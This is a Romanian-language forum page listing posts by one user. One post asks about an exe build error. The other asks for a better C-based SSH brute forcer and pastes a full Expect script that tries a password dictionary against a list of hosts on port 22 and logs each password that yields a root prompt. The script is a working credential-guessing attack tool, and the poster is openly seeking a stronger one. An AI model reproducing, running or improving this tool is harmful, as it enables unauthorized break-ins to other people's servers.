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Everything posted by CiuLi

  1. eu am o problema cand dau sa creze exe imi scrie o erroare Dont Write sau ce .. si nul pot termina ma ajuta careva ?
  2. Am un brute force pentru port de 22 .. dar ee cam naspa .. tot caut unul .c ceva fain dar nu gasesc cineva mar putea ajuta ?? cu unul ? uitati asta e care il am #!/usr/bin/expect -f # # ssh brute forcer # This will alow you to specify hosts, password lists, and a user # I do not take any reponsibilty for what you do with this tool # Hopefully it will make your life easier rather then making other # peoples lifes more difficult! set timeout 4 set dictionary [lindex $argv 0] set file [lindex $argv 1] set user [lindex $argv 2] if {[llength $argv] != 3} { puts stderr "Usage: $argv0 <dictionary-file> <hosts-file <user>n" exit } set tryHost [open $file r] set tryPass [open $dictionary r] set passwords [read $tryPass] set hosts [read $tryHost] foreach ip $hosts { foreach passwd $passwords { spawn ssh $user@$ip expect ":" send "$passwdn" set logFile [open $ip.log a] expect "#" { puts $logFile "password for $ip is $passwdn" } set id [exp_pid] exec kill -INT $id } }
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